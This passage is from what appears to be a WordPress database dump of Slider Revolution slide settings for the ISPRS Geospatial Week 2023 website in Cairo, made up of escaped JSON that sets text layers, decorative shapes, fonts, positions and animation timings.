px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":3000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":3000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"color\":{\"d\":{\"v\":\"#007aff\",\"e\":true},\"n\":{\"v\":\"#007aff\"},\"t\":{\"v\":\"#007aff\"},\"m\":{\"v\":\"#007aff\"}},\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontSize\":{\"d\":{\"v\":\"40\"},\"n\":{\"v\":\"36\"},\"t\":{\"v\":\"32\"},\"m\":{\"v\":\"28\"}},\"fontWeight\":{\"d\":{\"v\":\"900\"},\"n\":{\"v\":\"900\"},\"t\":{\"v\":\"900\"},\"m\":{\"v\":\"900\"}},\"lineHeight\":{\"d\":{\"v\":\"50\"},\"n\":{\"v\":\"45\"},\"t\":{\"v\":\"40\"},\"m\":{\"v\":\"35\"}},\"textAlign\":{\"d\":{\"v\":\"center\"},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"textTransform\":\"uppercase\",\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[],\"inactive_actions\":[]},\"type\":\"text\",\"version\":\"6.6.0\"},\"5\":{\"text\":\"Remote Sensing For Better Future\",\"alias\":\"Copy  text-4\",\"uid\":5,\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"655px\"},\"n\":{\"v\":\"595px\"},\"t\":{\"v\":\"535px\"},\"m\":{\"v\":\"475px\"}},\"minWidth\":{\"d\":{\"e\":true}},\"minHeight\":{\"d\":{\"v\":\"0px\",\"e\":true}},\"aspectRatio\":{\"d\":{\"v\":\"none\"},\"n\":{\"v\":\"none\"},\"t\":{\"v\":\"none\"},\"m\":{\"v\":\"none\"}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"241px\",\"e\":true},\"n\":{\"v\":\"219px\"},\"t\":{\"v\":\"197px\"},\"m\":{\"v\":\"175px\"}},\"y\":{\"d\":{\"v\":\"201px\",\"e\":true},\"n\":{\"v\":\"182px\"},\"t\":{\"v\":\"163px\"},\"m\":{\"v\":\"144px\"}},\"zIndex\":15,\"position\":\"absolute\"},\"group\":{\"groupOrder\":15},\"timeline\":{\"frames\":{\"frame_0\":{\"timeline\":{\"endWithSlide\":false}},\"frame_1\":{\"timeline\":{\"endWithSlide\":false,\"frameLength\":300}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":3000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":3000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"color\":{\"d\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontFamily\":\"Arial\",\"fontSize\":{\"d\":{\"v\":\"40\"},\"n\":{\"v\":\"36\"},\"t\":{\"v\":\"32\"},\"m\":{\"v\":\"28\"}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"50\"},\"n\":{\"v\":\"45\"},\"t\":{\"v\":\"40\"},\"m\":{\"v\":\"35\"}},\"textAlign\":{\"d\":{\"v\":\"center\"},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"backgroundColor\":\"rgba(0, 0, 0, 0.45)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"boxShadow\":{\"inuse\":true,\"hoffset\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"voffset\":{\"d\":{\"v\":\"10px\"},\"n\":{\"v\":\"9px\"},\"t\":{\"v\":\"8px\"},\"m\":{\"v\":\"7px\"}},\"blur\":{\"d\":{\"v\":\"10px\"},\"n\":{\"v\":\"9px\"},\"t\":{\"v\":\"8px\"},\"m\":{\"v\":\"7px\"}},\"spread\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"color\":\"rgba(0,0,0,0.25)\"},\"textShadow\":{\"inuse\":true,\"hoffset\":{\"d\":{\"v\":\"7px\"},\"n\":{\"v\":\"6px\"},\"t\":{\"v\":\"5px\"},\"m\":{\"v\":\"4px\"}},\"voffset\":{\"d\":{\"v\":\"7px\"},\"n\":{\"v\":\"6px\"},\"t\":{\"v\":\"5px\"},\"m\":{\"v\":\"4px\"}},\"blur\":{\"d\":{\"v\":\"10px\"},\"n\":{\"v\":\"9px\"},\"t\":{\"v\":\"8px\"},\"m\":{\"v\":\"7px\"}},\"color\":\"rgba(0,0,0,0.75)\"},\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[],\"inactive_actions\":[]},\"type\":\"text\",\"version\":\"6.6.0\"},\"6\":{\"text\":\"\\nCairo,Egypt,\\nSeptember 2-7, 2023\",\"alias\":\"Copy  text-8\",\"uid\":6,\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"655px\",\"e\":true},\"n\":{\"v\":\"595px\"},\"t\":{\"v\":\"535px\"},\"m\":{\"v\":\"475px\"}},\"height\":{\"d\":{\"e\":true}},\"minWidth\":{\"d\":{\"e\":true}},\"minHeight\":{\"d\":{\"v\":\"0px\",\"e\":true}},\"aspectRatio\":{\"d\":{\"v\":\"none\"},\"n\":{\"v\":\"none\"},\"t\":{\"v\":\"none\"},\"m\":{\"v\":\"none\"}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"241px\",\"e\":true},\"n\":{\"v\":\"219px\"},\"t\":{\"v\":\"197px\"},\"m\":{\"v\":\"175px\"}},\"y\":{\"d\":{\"v\":\"251px\",\"e\":true},\"n\":{\"v\":\"228px\"},\"t\":{\"v\":\"205px\"},\"m\":{\"v\":\"182px\"}},\"zIndex\":13,\"position\":\"absolute\"},\"group\":{\"groupOrder\":13},\"timeline\":{\"frames\":{\"frame_0\":{\"timeline\":{\"endWithSlide\":false}},\"frame_1\":{\"timeline\":{\"endWithSlide\":false,\"frameLength\":300}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":3000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":3000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"color\":{\"d\":{\"v\":\"#fff\"},\"n\":{\"v\":\"#fff\"},\"t\":{\"v\":\"#fff\"},\"m\":{\"v\":\"#fff\"}},\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontFamily\":\"Roboto Condensed\",\"fontSize\":{\"d\":{\"v\":\"36\"},\"n\":{\"v\":\"32\"},\"t\":{\"v\":\"28\"},\"m\":{\"v\":\"24\"}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"1\"}},\"lineHeight\":{\"d\":{\"v\":\"40\"},\"n\":{\"v\":\"36\"},\"t\":{\"v\":\"32\"},\"m\":{\"v\":\"28\"}},\"textAlign\":{\"d\":{\"v\":\"center\"},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"backgroundColor\":\"rgba(0, 0, 0, 0.45)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"boxShadow\":{\"inuse\":true,\"hoffset\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"voffset\":{\"d\":{\"v\":\"10px\"},\"n\":{\"v\":\"9px\"},\"t\":{\"v\":\"8px\"},\"m\":{\"v\":\"7px\"}},\"blur\":{\"d\":{\"v\":\"10px\"},\"n\":{\"v\":\"9px\"},\"t\":{\"v\":\"8px\"},\"m\":{\"v\":\"7px\"}},\"spread\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"color\":\"rgba(0,0,0,0.25)\"},\"textShadow\":{\"inuse\":true,\"hoffset\":{\"d\":{\"v\":\"7px\"},\"n\":{\"v\":\"6px\"},\"t\":{\"v\":\"5px\"},\"m\":{\"v\":\"4px\"}},\"voffset\":{\"d\":{\"v\":\"7px\"},\"n\":{\"v\":\"6px\"},\"t\":{\"v\":\"5px\"},\"m\":{\"v\":\"4px\"}},\"blur\":{\"d\":{\"v\":\"10px\"},\"n\":{\"v\":\"9px\"},\"t\":{\"v\":\"8px\"},\"m\":{\"v\":\"7px\"}},\"color\":\"rgba(0,0,0,0.75)\"},\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[],\"inactive_actions\":[]},\"type\":\"text\",\"version\":\"6.6.0\"},\"12\":{\"text\":\"\",\"alias\":\"Shape\",\"uid\":12,\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"500px\",\"e\":true},\"n\":{\"v\":\"500px\"},\"t\":{\"v\":\"500px\"},\"m\":{\"v\":\"500px\"}},\"height\":{\"d\":{\"v\":\"500px\",\"e\":true},\"n\":{\"v\":\"500px\"},\"t\":{\"v\":\"500px\"},\"m\":{\"v\":\"500px\"}},\"originalWidth\":\"500px\",\"originalHeight\":\"500px\",\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"-5800px\",\"e\":true},\"n\":{\"v\":\"-5800px\"},\"t\":{\"v\":\"-5800px\"},\"m\":{\"v\":\"-5800px\"}},\"y\":{\"d\":{\"v\":\"-5100px\",\"e\":true},\"n\":{\"v\":\"-5100px\"},\"t\":{\"v\":\"-5100px\"},\"m\":{\"v\":\"-5100px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"position\":\"absolute\",\"zIndex\":8},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"rotationZ\":45},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10,\"endWithSlide\":false},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"transform\":{\"rotationZ\":45},\"timeline\":{\"start\":10,\"startRelative\":10,\"endWithSlide\":false,\"frameLength\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"transform\":{\"opacity\":\"0\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":2690,\"endWithSlide\":true,\"frameLength\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"speed\":4000,\"yoyo_move\":true},\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":3000}],\"hoverFilterUsed\":false,\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"color\":{\"d\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":true},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":true},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"autolinebreak\":false,\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"borderColor\":\"rgba(255, 255, 255, 0.3)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderStyle\":{\"d\":{\"v\":\"solid\"},\"n\":{\"v\":\"solid\"},\"t\":{\"v\":\"solid\"},\"m\":{\"v\":\"solid\"}},\"borderWidth\":[\"5px\",\"5px\",\"5px\",\"5px\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"triggerMemory\":\"keep\",\"action\":[],\"inactive_actions\":[],\"animationoverwrite\":\"wait\"},\"runtime\":{\"internalClass\":\"tp-shape tp-shapewrapper\"},\"type\":\"shape\",\"version\":\"6.6.0\"},\"14\":{\"text\":\"\",\"alias\":\"Shape\",\"uid\":14,\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"500px\",\"e\":true},\"n\":{\"v\":\"500px\"},\"t\":{\"v\":\"500px\"},\"m\":{\"v\":\"500px\"}},\"height\":{\"d\":{\"v\":\"500px\",\"e\":true},\"n\":{\"v\":\"500px\"},\"t\":{\"v\":\"500px\"},\"m\":{\"v\":\"500px\"}},\"originalWidth\":\"500px\",\"originalHeight\":\"500px\",\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"5800px\",\"e\":true},\"n\":{\"v\":\"5800px\"},\"t\":{\"v\":\"5800px\"},\"m\":{\"v\":\"5800px\"}},\"y\":{\"d\":{\"v\":\"5100px\",\"e\":true},\"n\":{\"v\":\"5100px\"},\"t\":{\"v\":\"5100px\"},\"m\":{\"v\":\"5100px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"position\":\"absolute\",\"zIndex\":9},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"rotationZ\":45},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10,\"endWithSlide\":false},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"transform\":{\"rotationZ\":45},\"timeline\":{\"start\":10,\"startRelative\":10,\"endWithSlide\":false,\"frameLength\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"transform\":{\"opacity\":\"0\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":2690,\"endWithSlide\":true,\"frameLength\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"speed\":4000,\"yoyo_move\":true},\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":3000}],\"hoverFilterUsed\":false,\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"color\":{\"d\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":true},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":true},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"autolinebreak\":false,\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"borderColor\":\"rgba(255, 255, 255, 0.3)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderStyle\":{\"d\":{\"v\":\"solid\"},\"n\":{\"v\":\"solid\"},\"t\":{\"v\":\"solid\"},\"m\":{\"v\":\"solid\"}},\"borderWidth\":[\"5px\",\"5px\",\"5px\",\"5px\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"triggerMemory\":\"keep\",\"action\":[],\"inactive_actions\":[],\"animationoverwrite\":\"wait\"},\"runtime\":{\"internalClass\":\"tp-shape tp-shapewrapper\"},\"type\":\"shape\",\"version\":\"6.6.0\"},\"16\":{\"text\":\"\",\"alias\":\"Shape\",\"uid\":16,\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"500px\",\"e\":true},\"n\":{\"v\":\"500px\"},\"t\":{\"v\":\"500px\"},\"m\":{\"v\":\"500px\"}},\"height\":{\"d\":{\"v\":\"500px\",\"e\":true},\"n\":{\"v\":\"500px\"},\"t\":{\"v\":\"500px\"},\"m\":{\"v\":\"500px\"}},\"originalWidth\":\"500px\",\"originalHeight\":\"500px\",\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"5700px\",\"e\":true},\"n\":{\"v\":\"5700px\"},\"t\":{\"v\":\"5700px\"},\"m\":{\"v\":\"5700px\"}},\"y\":{\"d\":{\"v\":\"-5300px\",\"e\":true},\"n\":{\"v\":\"-5300px\"},\"t\":{\"v\":\"-5300px\"},\"m\":{\"v\":\"-5300px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"position\":\"absolute\",\"zIndex\":10},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"rotationZ\":45},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10,\"endWithSlide\":false},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"transform\":{\"rotationZ\":45},\"timeline\":{\"start\":10,\"startRelative\":10,\"endWithSlide\":false,\"frameLength\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"transform\":{\"opacity\":\"0\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":2690,\"endWithSlide\":true,\"frameLength\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"speed\":4000,\"yoyo_move\":true},\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":3000}],\"hoverFilterUsed\":false,\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"color\":{\"d\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":true},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":true},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"autolinebreak\":false,\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"borderColor\":\"rgba(225, 28, 89, 0.4)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderStyle\":{\"d\":{\"v\":\"solid\"},\"n\":{\"v\":\"solid\"},\"t\":{\"v\":\"solid\"},\"m\":{\"v\":\"solid\"}},\"borderWidth\":[\"5px\",\"5px\",\"5px\",\"5px\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"triggerMemory\":\"keep\",\"action\":[],\"inactive_actions\":[],\"animationoverwrite\":\"wait\"},\"runtime\":{\"internalClass\":\"tp-shape tp-shapewrapper\"},\"type\":\"shape\",\"version\":\"6.6.0\"},\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":7},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":7,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":6},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":6,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":5},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":5,\"position\":\"absolute\"},\"version\":\"6.6.0\"}}','{\"version\":\"6.6.0\"}'),
(11,4,1,'{\"runtime\":{\"collapsedGroups\":[]},\"bg\":{\"type\":\"image\",\"image\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/12.jpg\",\"imageId\":2731,\"imageFromStream\":true,\"imageLib\":\"medialibrary\",\"imageWidth\":1280,\"imageHeight\":695,\"imageRatio\":1.841726618705036},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"slideChange\":{\"in\":{\"o\":0},\"out\":{\"a\":false},\"title\":\"*opacity* Fade In\",\"main\":\"basic\",\"group\":\"fade\",\"preset\":\"fade\",\"adpr\":false},\"version\":\"6.6.0\"}','{\"2\":{\"text\":\"The ISPRS 2023 Geospatial Week\\n(Egypt GSW\'2023)\",\"alias\":\"Copy  text-1\",\"uid\":2,\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"891.938px\",\"e\":true},\"n\":{\"v\":\"810px\"},\"t\":{\"v\":\"729px\"},\"m\":{\"v\":\"648px\"}},\"height\":{\"d\":{\"e\":true}},\"maxWidth\":{\"d\":{\"e\":true}},\"maxHeight\":{\"d\":{\"e\":true}},\"minWidth\":{\"d\":{\"e\":true}},\"minHeight\":{\"d\":{\"v\":\"0px\",\"e\":true}},\"aspectRatio\":{\"d\":{\"v\":\"none\"},\"n\":{\"v\":\"none\"},\"t\":{\"v\":\"none\"},\"m\":{\"v\":\"none\"}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"97px\",\"e\":true},\"n\":{\"v\":\"88px\"},\"t\":{\"v\":\"79px\"},\"m\":{\"v\":\"70px\"}},\"y\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"65px\"},\"t\":{\"v\":\"58px\"},\"m\":{\"v\":\"51px\"}},\"zIndex\":12,\"position\":\"absolute\"},\"group\":{\"groupOrder\":12},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"timeline\":{\"endWithSlide\":false},\"chars\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\